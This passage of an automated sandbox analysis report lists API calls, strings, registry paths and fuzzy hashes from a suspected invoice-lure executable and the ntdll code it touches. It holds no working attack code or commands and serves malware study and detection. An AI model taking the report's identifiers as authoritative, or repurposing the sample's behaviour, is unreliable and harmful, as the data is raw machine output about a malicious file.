                                    • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 00405D8C
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480), ref: 00405DB3
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,0000104D,00000000,?), ref: 00405DCE
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,00001013,00000000,00000000), ref: 00405DDB
                                    • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                    • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                    • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                  • CloseHandle.KERNEL32(?,?), ref: 00402110
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll, xrefs: 00402098
                                  • @, xrefs: 004020F2
                                  • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 004020D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                  • String ID: @$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 4079680657-4143260430
                                  • Opcode ID: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                  • Instruction ID: 1a2f5228193f18700cea608b7af5492b6fd1c87105d587b586e39d0dc9a83391
                                  • Opcode Fuzzy Hash: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                  • Instruction Fuzzy Hash: 3C118C71A483809BC710AFA2C94561ABBE9BFC4745F40493EF595A72D1DBBC8805CB4A
                                  APIs
                                  • DestroyWindow.USER32(00000000,00403554), ref: 00403375
                                  • GetTickCount.KERNEL32 ref: 00403394
                                  • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                  • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                  • Instruction ID: 05fd0e373085f508408529d976a5f5643121ad856ee530bb797c10a8200a5ccc
                                  • Opcode Fuzzy Hash: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                  • Instruction Fuzzy Hash: 2EF0F870651700EBEB209F60EF8DB1A3AA8B740B06F801979F941B51F0DFB89540CA5C
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 004058DF
                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                    • Part of subcall function 004054C3: SendMessageW.USER32(0001047A,00000000,00000000,00000000), ref: 004054D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                  • Instruction ID: b1e338e3564b8c01f07b09259678d1708f9cc3666d75656fad75f4110972ebbf
                                  • Opcode Fuzzy Hash: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                  • Instruction Fuzzy Hash: 5401D472600619EBDF202F01DC04ADB3A25EB94768F004437F904B62E1C77989A29FED
                                  APIs
                                  • DispatchMessageW.USER32(?), ref: 004061F6
                                  • PeekMessageW.USER32(?,00000000,?,T5@,?), ref: 0040620A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Message$DispatchPeek
                                  • String ID: T5@
                                  • API String ID: 1770753511-1075436632
                                  • Opcode ID: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                  • Instruction ID: 9faa2b1bfb0e31a5f243467a4896c54f1023d1031c98b050ea5e6b6ce42c350d
                                  • Opcode Fuzzy Hash: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                  • Instruction Fuzzy Hash: 89D0123190020DA7DF109FE0DD09F9A7B6D6B04744F008035B742A9091D679D1179B99
                                  APIs
                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403433,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00406CF1
                                  • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D02
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-1246513382
                                  • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                  • Instruction ID: 4dbe35682b60e6d52269d03a3853e7a49c7dcb535e87d19da2916c46be0a3be3
                                  • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                  • Instruction Fuzzy Hash: EBD05E31015924DBD7526B18ED099AF7BB8EF0130030A846EE987E3160CB385C9187AD

                                  Execution Graph

                                  Execution Coverage:0%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:100%
                                  Total number of Nodes:1
                                  Total number of Limit Nodes:0
                                  execution_graph 81953 32522b60 LdrInitializeThunk

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3 325235c0-325235cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                  • Instruction ID: 901f55cd631d95ff1acd2a401f06906f97f833eeec9581b60af63e1ade93d473
                                  • Opcode Fuzzy Hash: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                  • Instruction Fuzzy Hash: AF90023160650402D10571585618746115547D0211F69D412E1428528D87958B5575A2

                                  Control-flow Graph

                                  control_flow_graph 0 32522b60-32522b6c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                  • Instruction ID: d09a84b34bc0d4ec528d12ebb2a41203fd24f572147d881b0132a542c1bf15e1
                                  • Opcode Fuzzy Hash: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                  • Instruction Fuzzy Hash: 5890026120340003410A71585518756415A47E0211B59D022E2018550DC5258A957125

                                  Control-flow Graph

                                  control_flow_graph 1 32522c70-32522c7c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                  • Instruction ID: 9098bf4c1091865611e31995e4432c0f01cdde84f4a81288ed4074767029000f
                                  • Opcode Fuzzy Hash: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                  • Instruction Fuzzy Hash: 4C90023120248802D1157158950878A015547D0311F5DD412E5428618D86958A957121

                                  Control-flow Graph

                                  control_flow_graph 2 32522df0-32522dfc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                  • Instruction ID: 79b42483e59f6db2ebafd46d33cd99892196bd85a76985e76e78c621789691aa
                                  • Opcode Fuzzy Hash: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                  • Instruction Fuzzy Hash: DA90023120240413D11671585608747015947D0251F99D413E1428518D96568B56B121

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $ $0
                                  • API String ID: 3446177414-3352262554
                                  • Opcode ID: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                  • Instruction ID: 16146015e5e0b045e5200cf4aeca2ddb21d78ea1d72a483d83ad3c7e619fd449
                                  • Opcode Fuzzy Hash: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                  • Instruction Fuzzy Hash: 9032F5B56083818FE310CF68C584B5BFBE5BB88348F50492DF59987350DBB5EA49CB52

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 3446177414-1700792311
                                  • Opcode ID: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                  • Instruction ID: a2a0b79f1320000134df6f934c82201d96c3ae20c9f2aa96ab5b5f8a4d92b171
                                  • Opcode Fuzzy Hash: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                  • Instruction Fuzzy Hash: 63D1AC36901685DFDB06CF68C450AEDFBF1EF4A314F448899E889EB252DB749A81CF10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/P2$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                  • API String ID: 0-674978239
                                  • Opcode ID: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                  • Instruction ID: 0176c48ed6959e02b753351a9524f6dbef7188ffcfd57a7ba0f2c2d65773f2de
                                  • Opcode Fuzzy Hash: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                  • Instruction Fuzzy Hash: FEB1EEB6808351DFD715CF24C8A0B5BBBE8AF88754F41092EF988D7241DB70DA49CB92
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                  • API String ID: 3446177414-1745908468
                                  • Opcode ID: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                  • Instruction ID: 5011db66180615c67879835883c0a26dc3e9a88173bdf25dc12e2bf533f09e98
                                  • Opcode Fuzzy Hash: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                  • Instruction Fuzzy Hash: FB91CC35A01685DFEB06CF68C450A9DBBF2FF49314F94845DE845EB262CBB59A81CF10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                  • API String ID: 0-3591852110
                                  • Opcode ID: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                  • Instruction ID: adca2647442f944874057eb9c009592627c5656055447102e503db4701e33c2e
                                  • Opcode Fuzzy Hash: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                  • Instruction Fuzzy Hash: 8B128D74600762DFEB158F24C450BBABBF5EF09B54F54C89DE8868B642DB34EA81CB50
                                  Strings
                                  • @, xrefs: 324DD2AF
                                  • @, xrefs: 324DD0FD
                                  • H/P2, xrefs: 3253A843
                                  • @, xrefs: 324DD313
                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 324DD146
                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 324DD0CF
                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 324DD262
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 324DD2C3
                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 324DD196
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/P2$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                  • API String ID: 0-3973197215
                                  • Opcode ID: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                  • Instruction ID: a89f89e457ec6d0c710f830b18ac6a0642751ec3b9192aa2f93a68e55da0f0bd
                                  • Opcode Fuzzy Hash: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                  • Instruction Fuzzy Hash: E3A15D76908345DFE711CF21C490B9BB7E8BF88755F40492EEA8896281DB74DA48CF93
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                  • API String ID: 3446177414-3570731704
                                  • Opcode ID: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                  • Instruction ID: 99427c71fda525d0ec04198dbf8e5205cd18d1848af9f9b432b1c6a5dfdd3562
                                  • Opcode Fuzzy Hash: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                  • Instruction Fuzzy Hash: 81924475A01368DFEB24CF28C840B99B7B5AF85754F1181EAE84DAB380DB719E81CF51
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 3250D959
                                    • Part of subcall function 324E4859: RtlDebugPrintTimes.NTDLL ref: 324E48F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1975516107
                                  • Opcode ID: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                  • Instruction ID: 1662c5b5b2b54eb9dd7b8ed36f88cc948dfab0bbe4a6af34d68d671336e024e7
                                  • Opcode Fuzzy Hash: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                  • Instruction Fuzzy Hash: EC51BC75E063459BEB04CFA4CC8479DBBB1FF44728F548559D801AB281DBB1AA82CF90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                  • API String ID: 3446177414-3224558752
                                  • Opcode ID: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                  • Instruction ID: 3fa13cb8eab8c6c6f1c2aeab3fca085173bfef38aa1f0f8d08414e05c33e5e48
                                  • Opcode Fuzzy Hash: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                  • Instruction Fuzzy Hash: 66413575A01740DFE701CF28C994B6AFBB4EF40368F1085A9E8419B791CF78AA80CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                  • API String ID: 0-3063724069
                                  • Opcode ID: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                  • Instruction ID: d69845fa119f07e25be7db1021fdfc5a6b3db40c0a7e8b4aef0ff809c81d758a
                                  • Opcode Fuzzy Hash: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                  • Instruction Fuzzy Hash: EFD1C7B2845395AFD721CB58C940B9BBBE8AFC4754F814A2DF98497150E770CF488BA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-523794902
                                  • Opcode ID: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                  • Instruction ID: 8627010d87469f59aa042ba9b06964094997bca4a927bbefb9bfecf39d4c71fc
                                  • Opcode Fuzzy Hash: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                  • Instruction Fuzzy Hash: 1B42E0756053819FD715CF24C8A0B1ABBE5FF84348F05596DE885CB352DB34EA82CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H/P2$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-2399442170
                                  • Opcode ID: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                  • Instruction ID: 6cdd88b4827bb418b004110b97b876870fed42ddc238f0a87d0ebeac7039e49e
                                  • Opcode Fuzzy Hash: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                  • Instruction Fuzzy Hash: 05F13AB6D11219EFDB15CFA8C980ADEBBB9FF48750F51446AE501A7250EA709F01CFA0
                                  Strings
                                  Memory Dump Source
